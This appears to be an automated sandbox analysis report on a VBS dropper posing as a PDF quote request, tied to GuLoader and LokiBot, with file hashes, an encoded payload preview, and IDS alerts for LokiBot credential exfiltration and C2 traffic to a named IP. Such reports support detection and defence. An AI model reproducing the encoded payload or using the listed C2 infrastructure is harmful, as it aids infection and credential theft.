                          • 142.250.184.193
                          • 216.58.206.46
                          Awb_Shipping_Invoice_docs_001700720242247820020031808174CN18003170072024.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                          • 142.250.184.193
                          • 216.58.206.46
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          C:\Users\user\AppData\Roaming\188E93\31437F.exePRORA#U010cUNSKA ZAHTEVA 09-30-2024#U00b7pdf.vbeGet hashmaliciousGuLoader, LokibotBrowse
                            Solicitud de presupuesto 09-30-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:modified
                              Size (bytes):8003
                              Entropy (8bit):4.840877972214509
                              Encrypted:false
                              SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                              MD5:106D01F562D751E62B702803895E93E0
                              SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                              SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                              SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                              Malicious:false
                              Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):64
                              Entropy (8bit):1.1628158735648508
                              Encrypted:false
                              SSDEEP:3:Nlllul5mxllp:NllU4x/
                              MD5:3A925CB766CE4286E251C26E90B55CE8
                              SHA1:3FA8EE6E901101A4661723B94D6C9309E281BD28
                              SHA-256:4E844662CDFFAAD50BA6320DC598EBE0A31619439D0F6AB379DF978FE81C7BF8
                              SHA-512:F348B4AFD42C262BBED07D6BDEA6EE4B7F5CFA2E18BFA725225584E93251188D9787506C2AFEAC482B606B1EA0341419F229A69FF1E9100B01DE42025F915788
                              Malicious:false
                              Preview:@...e................................................@..........
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\SysWOW64\dxdiag.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):222720
                              Entropy (8bit):5.934092890012391
                              Encrypted:false
                              SSDEEP:3072:MMlaJEzHyusOl081O6Zdtx7SNchIarfvdNpNXXR2P9K:k0HF/1l9lhIabdNpNMP
                              MD5:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                              SHA1:B65ED4B4B1FB9CC5C128EE48A0B7CD326BA3AC93
                              SHA-256:C36C36C2945802FEB2195AD271C98F994B22A09F6CF2A1764A190865D1D6CE2B
                              SHA-512:7C4CC31303C59903E74B29B6EC14138611567A09281A4728D2B2A9B170E14344395173C1D97DF34B2F0391BC7365AC856884643C857325C3EA293AEF643C53E7
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              • Antivirus: Virustotal, Detection: 0%, Browse
                              Joe Sandbox View:
                              • Filename: PRORA#U010cUNSKA ZAHTEVA 09-30-2024#U00b7pdf.vbe, Detection: malicious, Browse
                              • Filename: Solicitud de presupuesto 09-30-2024#U00b7pdf.vbs, Detection: malicious, Browse
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D@C..!-..!-..!-..Y...!-..J...!-..J)..!-..J,..!-..!,..%-..J$..!-..J(."!-..J..!-..J..!-..J/..!-.Rich.!-.........................PE..L...)c............................................@.......................................@...... ......................................Xt...................p..."..p...T...........................X................................................text...d........................... ..`.data...............................@....idata..*...........................@..@.rsrc...Xt.......v..................@..@.reloc..."...p...$...B..............@..B........................................................................................................................................................................................................................................................................................................
                              Process:C:\Windows\SysWOW64\dxdiag.exe
                              File Type:very short file (no magic)
                              Category:dropped
                              Size (bytes):1
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3:U:U
                              MD5:C4CA4238A0B923820DCC509A6F75849B
                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                              Malicious:false
                              Preview:1
                              Process:C:\Windows\SysWOW64\dxdiag.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):47
                              Entropy (8bit):1.168829563685559
                              Encrypted:false
                              SSDEEP:3:/lSll2DQi:AoMi
                              MD5:DAB633BEBCCE13575989DCFA4E2203D6
                              SHA1:33186D50F04C5B5196C1FCC1FAD17894B35AC6C7
                              SHA-256:1C00FBA1B82CD386E866547F33E1526B03F59E577449792D99C882DEF05A1D17
                              SHA-512:EDDBB22D9FC6065B8F5376EC95E316E7569530EFAA9EA9BC641881D763B91084DCCC05BC793E8E29131D20946392A31BD943E8FC632D91EE13ABA7B0CD1C626F
                              Malicious:false
                              Preview:........................................user.
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with very long lines (65536), with no line terminators
                              Category:dropped
                              Size (bytes):469128
                              Entropy (8bit):5.961735662083921
                              Encrypted:false
                              SSDEEP:12288:h3z2AENQtjYhd5c1xNS+cbOanfilHRhw7Jpp:96AUQ1by++O0iGpp
                              MD5:743E8AA7E1D11F204B239E36BAFC481E
                              SHA1:A42AFAD52FDA74DECB6DEB3A12DEACFC6F639873
                              SHA-256:9FF25A7EBBCF8054D44FD7A23BD936D6A6B7D44E813301872DCB74BBCF918390
                              SHA-512:66BE179D313D849062B7C9C6A5BF20FD8993E34EC2995A4645FB83B3A95FFA676FAA066705C48F08A27393117EE4CA0EF46EB4757A363FD5ED500BB24A365580
                              Malicious:false
                              Preview:6wJtVXEBm7uG4hIA6wI42nEBmwNcJARxAZvrAiDfuRbtJoLrAhRV6wLoFoHxS47T+OsC0AlxAZuB6V1j9XpxAZvrAspR6wIReusC4Ey6v0HwYusCbCHrAgmo6wI+0HEBmzHKcQGbcQGbiRQLcQGb6wLuR9HicQGbcQGbg8EE6wLSFOsCBRqB+TrgPAN8zHEBm+sCms2LRCQEcQGbcQGbicNxAZvrAneJgcON9s8BcQGbcQGbunM2RXZxAZvrAotbgfLgnR9M6wLKh+sC8JmB8pOrWjpxAZvrAsEicQGbcQGbcQGbcQGbiwwQcQGb6wLM3YkME3EBm+sCJHpCcQGbcQGbgfqs5QQAddfrArXY6wL524lcJAxxAZvrAjzIge0AAwAAcQGbcQGbi1QkCHEBm3EBm4t8JARxAZvrAmDJievrAmEx6wI1soHDnAAAAOsCCgnrAlyeU+sCJirrAm/lakBxAZtxAZuJ63EBm+sC8QHHgwABAAAA0FID6wLhFOsCBj+BwwABAADrAr2L6wL55lNxAZvrAs5hietxAZvrApOoibsEAQAAcQGb6wJacIHDBAEAAOsCvU7rAh6qU+sCg+JxAZtq/+sC0vxxAZuDwgXrAubNcQGbMfbrArL66wJBnTHJcQGbcQGbixrrAnZK6wKbZkHrAodx6wIhzzkcCnXycQGb6wIfy0ZxAZvrAklzgHwK+7h13OsCDpBxAZuLRAr86wIogusCTjEp8HEBm3EBm//S6wKbQnEBm7qs5QQAcQGbcQGbMcDrAv1N6wK+84t8JAxxAZtxAZuBNAdLIyt56wIPz+sCy/eDwARxAZtxAZs50HXkcQGbcQGbiftxAZvrAi+w/9frAqru6wKr7s/jopyMZvCkmvsV+D74KnqDgKo8kMv15gyiXqKPkZudB9xmoj7Z3LiRarlbHqrOH87xkg5hOH0fzvMSqcrihnrE0aq4yNDaiMrKpFjXGU34sG37vg8uK9Axo038maJv
                              File type:ASCII text, with CRLF line terminators
                              Entropy (8bit):4.928020080791175
                              TrID:
                              • Visual Basic Script (13500/0) 100.00%
                              File name:Aj#U00e1nlatk#U00e9r#U00e9s 09-30-2024#U00b7pdf.vbs
                              File size:79'495 bytes
                              MD5:34273527e12e172917598d0e29994432
                              SHA1:d390fd4b4ffc45be0a7cf05765af19e402377640
                              SHA256:2c2a57b3a137d49c53bf35a36a7136a78d67fcaa16b8f352a6b46a457d691815
                              SHA512:b9693348f7ddc2564c7a1ce748e58b080c73e57a85ae8f3b673d60106be4c967708c035ca2a820b7470a2be7642592c2db6c14ec9cccd0849eb153f8caebb6f9
                              SSDEEP:1536:sI0FsAXA4vqGxAx9bBuQPOyk+4OU8vL0yUbVBwXYf:sIcpPAPbB4OFQyIf
                              TLSH:76737FE19F8C0E3DA943CEDF7A4919A1807B529C8B374CB8ED890E09729146CD77EE54
                              File Content Preview:..Rem Omohyoid? stromata? signficance debasingly!..Rem Serbantian? dimers.....Rem Trapperummet smaskede conhydrine! midterfigurernes vav..Rem Zamorine unbalanceable, navnetypes2 kunsthandler? forbiddingness:..Rem Pullers reuter: apperceptionism: effektivi
                              Icon Hash:68d69b8f86ab9a86
                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                              2024-10-01T07:50:12.725465+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.565310216.58.206.46443TCP
                              2024-10-01T07:50:17.173892+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.565313137.184.191.21580TCP
                              2024-10-01T07:50:17.173892+02002025381ET MALWARE LokiBot Checkin1192.168.2.565313137.184.191.21580TCP
                              2024-10-01T07:50:19.722830+02002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.565313137.184.191.21580TCP
                              2024-10-01T07:50:19.797177+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.565314137.184.191.21580TCP
                              2024-10-01T07:50:19.797177+02002025381ET MALWARE LokiBot Checkin1192.168.2.565314137.184.191.21580TCP
                              2024-10-01T07:50:22.492536+02002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.565314137.184.191.21580TCP
                              2024-10-01T07:50:22.586132+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.565315137.184.191.21580TCP
                              2024-10-01T07:50:22.586132+02002025381ET MALWARE LokiBot Checkin1192.168.2.565315137.184.191.21580TCP
                              2024-10-01T07:50:25.189714+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.565315137.184.191.21580TCP
                              2024-10-01T07:50:25.189714+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.565315137.184.191.21580TCP
                              2024-10-01T07:50:25.349105+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.565316137.184.191.21580TCP
                              2024-10-01T07:50:25.349105+02002025381ET MALWARE LokiBot Checkin1192.168.2.565316137.184.191.21580TCP
                              2024-10-01T07:50:28.108644+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.565316137.184.191.21580TCP
                              2024-10-01T07:50:28.108644+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.565316137.184.191.21580TCP
                              2024-10-01T07:50:28.274534+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.565317137.184.191.21580TCP
                              2024-10-01T07:50:28.274534+02002025381ET MALWARE LokiBot Checkin1192.168.2.565317137.184.191.21580TCP
                              2024-10-01T07:50:30.981103+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.565317137.184.191.21580TCP
                              2024-10-01T07:50:30.981103+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.565317137.184.191.21580TCP
                              2024-10-01T07:50:31.128558+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.565318137.184.191.21580TCP
                              2024-10-01T07:50:31.128558+02002025381ET MALWARE LokiBot Checkin1192.168.2.565318137.184.191.21580TCP
                              2024-10-01T07:50:33.776083+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.565318137.184.191.21580TCP
                              2024-10-01T07:50:33.776083+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.565318137.184.191.21580TCP
                              2024-10-01T07:50:33.929630+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.565319137.184.191.21580TCP
                              2024-10-01T07:50:33.929630+02002025381ET MALWARE LokiBot Checkin1192.168.2.565319137.184.191.21580TCP
                              2024-10-01T07:50:36.691428+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.565319137.184.191.21580TCP
                              2024-10-01T07:50:36.691428+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.565319137.184.191.21580TCP
                              2024-10-01T07:50:36.850013+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.565320137.184.191.21580TCP
                              2024-10-01T07:50:36.850013+02002025381ET MALWARE LokiBot Checkin1192.168.2.565320137.184.191.21580TCP
                              2024-10-01T07:50:39.490591+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.565320137.184.191.21580TCP
                              2024-10-01T07:50:39.490591+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.565320137.184.191.21580TCP
                              2024-10-01T07:50:39.646324+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.565321137.184.191.21580TCP
                              2024-10-01T07:50:39.646324+02002025381ET MALWARE LokiBot Checkin1192.168.2.565321137.184.191.21580TCP
                              2024-10-01T07:50:42.286069+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.565321137.184.191.21580TCP
                              2024-10-01T07:50:42.286069+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.565321137.184.191.21580TCP
                              2024-10-01T07:50:42.441873+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.565322137.184.191.21580TCP
                              2024-10-01T07:50:42.441873+02002025381ET MALWARE LokiBot Checkin1192.168.2.565322137.184.191.21580TCP
                              2024-10-01T07:50:45.008830+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.565322137.184.191.21580TCP
                              2024-10-01T07:50:45.008830+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.565322137.184.191.21580TCP
                              2024-10-01T07:50:45.176865+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.565323137.184.191.21580TCP
                              2024-10-01T07:50:45.176865+02002025381ET MALWARE LokiBot Checkin1192.168.2.565323137.184.191.21580TCP
                              2024-10-01T07:50:47.717956+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.565323137.184.191.21580TCP
                              2024-10-01T07:50:47.717956+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.565323137.184.191.21580TCP
                              2024-10-01T07:50:47.882333+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.565324137.184.191.21580TCP
                              2024-10-01T07:50:47.882333+02002025381ET MALWARE LokiBot Checkin1192.168.2.565324137.184.191.21580TCP
                              2024-10-01T07:50:50.529276+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.565324137.184.191.21580TCP
                              2024-10-01T07:50:50.529276+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.565324137.184.191.21580TCP
                              2024-10-01T07:50:50.691800+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.565325137.184.191.21580TCP
                              2024-10-01T07:50:50.691800+02002025381ET MALWARE LokiBot Checkin1192.168.2.565325137.184.191.21580TCP
                              2024-10-01T07:50:53.299070+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.565325137.184.191.21580TCP
                              2024-10-01T07:50:53.299070+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.565325137.184.191.21580TCP
                              2024-10-01T07:50:53.822128+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.565326137.184.191.21580TCP
                              2024-10-01T07:50:53.822128+02002025381ET MALWARE LokiBot Checkin1192.168.2.565326137.184.191.21580TCP
                              2024-10-01T07:50:56.411109+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.565326137.184.191.21580TCP
                              2024-10-01T07:50:56.411109+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.565326137.184.191.21580TCP
                              2024-10-01T07:50:56.584716+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.565327137.184.191.21580TCP
                              2024-10-01T07:50:56.584716+02002025381ET MALWARE LokiBot Checkin1192.168.2.565327137.184.191.21580TCP
                              2024-10-01T07:50:59.419708+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.565327137.184.191.21580TCP
                              2024-10-01T07:50:59.419708+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.565327137.184.191.21580TCP
                              2024-10-01T07:50:59.581594+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.565328137.184.191.21580TCP
                              2024-10-01T07:50:59.581594+02002025381ET MALWARE LokiBot Checkin1192.168.2.565328137.184.191.21580TCP
                              2024-10-01T07:51:02.151753+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.565328137.184.191.21580TCP
                              2024-10-01T07:51:02.151753+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.565328137.184.191.21580TCP
                              2024-10-01T07:51:02.303353+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.565329137.184.191.21580TCP
                              2024-10-01T07:51:02.303353+02002025381ET MALWARE LokiBot Checkin1192.168.2.565329137.184.191.21580TCP
                              2024-10-01T07:51:04.892615+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.565329137.184.191.21580TCP
                              2024-10-01T07:51:04.892615+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.565329137.184.191.21580TCP
                              2024-10-01T07:51:05.050083+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.565330137.184.191.21580TCP
                              2024-10-01T07:51:05.050083+02002025381ET MALWARE LokiBot Checkin1192.168.2.565330137.184.191.21580TCP
                              2024-10-01T07:51:07.677000+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.565330137.184.191.21580TCP
                              2024-10-01T07:51:07.677000+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.565330137.184.191.21580TCP
                              2024-10-01T07:51:07.830751+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.565331137.184.191.21580TCP
                              2024-10-01T07:51:07.830751+02002025381ET MALWARE LokiBot Checkin1192.168.2.565331137.184.191.21580TCP
                              2024-10-01T07:51:10.438149+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.565331137.184.191.21580TCP
                              2024-10-01T07:51:10.438149+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.565331137.184.191.21580TCP
                              2024-10-01T07:51:10.603999+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.565332137.184.191.21580TCP
                              2024-10-01T07:51:10.603999+02002025381ET MALWARE LokiBot Checkin1192.168.2.565332137.184.191.21580TCP
                              2024-10-01T07:51:13.143576+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.565332137.184.191.21580TCP
                              2024-10-01T07:51:13.143576+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.565332137.184.191.21580TCP
                              2024-10-01T07:51:13.301215+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.565333137.184.191.21580TCP
                              2024-10-01T07:51:13.301215+02002025381ET MALWARE LokiBot Checkin1192.168.2.565333137.184.191.21580TCP
                              2024-10-01T07:51:15.949625+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.565333137.184.191.21580TCP
                              2024-10-01T07:51:15.949625+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.565333137.184.191.21580TCP
                              2024-10-01T07:51:16.098837+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.565334137.184.191.21580TCP
                              2024-10-01T07:51:16.098837+02002025381ET MALWARE LokiBot Checkin1192.168.2.565334137.184.191.21580TCP
                              2024-10-01T07:51:18.675206+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.565334137.184.191.21580TCP
                              2024-10-01T07:51:18.675206+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.565334137.184.191.21580TCP
                              2024-10-01T07:51:18.891593+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.565335137.184.191.21580TCP
                              2024-10-01T07:51:18.891593+02002025381ET MALWARE LokiBot Checkin1192.168.2.565335137.184.191.21580TCP
                              2024-10-01T07:51:21.495905+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.565335137.184.191.21580TCP
                              2024-10-01T07:51:21.495905+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.565335137.184.191.21580TCP
                              2024-10-01T07:51:21.660429+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.565336137.184.191.21580TCP
                              2024-10-01T07:51:21.660429+02002025381ET MALWARE LokiBot Checkin1192.168.2.565336137.184.191.21580TCP
                              2024-10-01T07:51:24.246269+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.565336137.184.191.21580TCP
                              2024-10-01T07:51:24.246269+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.565336137.184.191.21580TCP
                              2024-10-01T07:51:24.397671+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.565337137.184.191.21580TCP
                              2024-10-01T07:51:24.397671+02002025381ET MALWARE LokiBot Checkin1192.168.2.565337137.184.191.21580TCP
                              2024-10-01T07:51:27.042555+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.565337137.184.191.21580TCP
                              2024-10-01T07:51:27.042555+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.565337137.184.191.21580TCP
                              2024-10-01T07:51:27.195364+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.565338137.184.191.21580TCP
                              2024-10-01T07:51:27.195364+02002025381ET MALWARE LokiBot Checkin1192.168.2.565338137.184.191.21580TCP
                              2024-10-01T07:51:29.857091+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.565338137.184.191.21580TCP
                              2024-10-01T07:51:29.857091+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.565338137.184.191.21580TCP
                              2024-10-01T07:51:30.009648+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.565339137.184.191.21580TCP
                              2024-10-01T07:51:30.009648+02002025381ET MALWARE LokiBot Checkin1192.168.2.565339137.184.191.21580TCP
                              2024-10-01T07:51:32.612078+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.565339137.184.191.21580TCP
                              2024-10-01T07:51:32.612078+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.565339137.184.191.21580TCP
                              2024-10-01T07:51:32.776795+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.565340137.184.191.21580TCP
                              2024-10-01T07:51:32.776795+02002025381ET MALWARE LokiBot Checkin1192.168.2.565340137.184.191.21580TCP
                              2024-10-01T07:51:35.482901+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.565340137.184.191.21580TCP
                              2024-10-01T07:51:35.482901+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.565340137.184.191.21580TCP
                              2024-10-01T07:51:35.646525+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.565341137.184.191.21580TCP
                              2024-10-01T07:51:35.646525+02002025381ET MALWARE LokiBot Checkin1192.168.2.565341137.184.191.21580TCP
                              2024-10-01T07:51:38.277828+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.565341137.184.191.21580TCP
                              2024-10-01T07:51:38.277828+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.565341137.184.191.21580TCP
                              2024-10-01T07:51:38.427887+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.565342137.184.191.21580TCP
                              2024-10-01T07:51:38.427887+02002025381ET MALWARE LokiBot Checkin1192.168.2.565342137.184.191.21580TCP
                              2024-10-01T07:51:41.101759+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.565342137.184.191.21580TCP
                              2024-10-01T07:51:41.101759+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.565342137.184.191.21580TCP
                              TimestampSource PortDest PortSource IPDest IP
                              Oct 1, 2024 07:49:35.720817089 CEST49705443192.168.2.5142.250.186.46
                              Oct 1, 2024 07:49:35.720906973 CEST44349705142.250.186.46192.168.2.5
                              Oct 1, 2024 07:49:35.720999956 CEST49705443192.168.2.5142.250.186.46
                              Oct 1, 2024 07:49:35.727838993 CEST49705443192.168.2.5142.250.186.46
                              Oct 1, 2024 07:49:35.727885008 CEST44349705142.250.186.46192.168.2.5
                              Oct 1, 2024 07:49:36.362752914 CEST44349705142.250.186.46192.168.2.5
                              Oct 1, 2024 07:49:36.362896919 CEST49705443192.168.2.5142.250.186.46
                              Oct 1, 2024 07:49:36.363838911 CEST44349705142.250.186.46192.168.2.5
                              Oct 1, 2024 07:49:36.363904953 CEST49705443192.168.2.5142.250.186.46
                              Oct 1, 2024 07:49:36.366867065 CEST49705443192.168.2.5142.250.186.46
                              Oct 1, 2024 07:49:36.366893053 CEST44349705142.250.186.46192.168.2.5
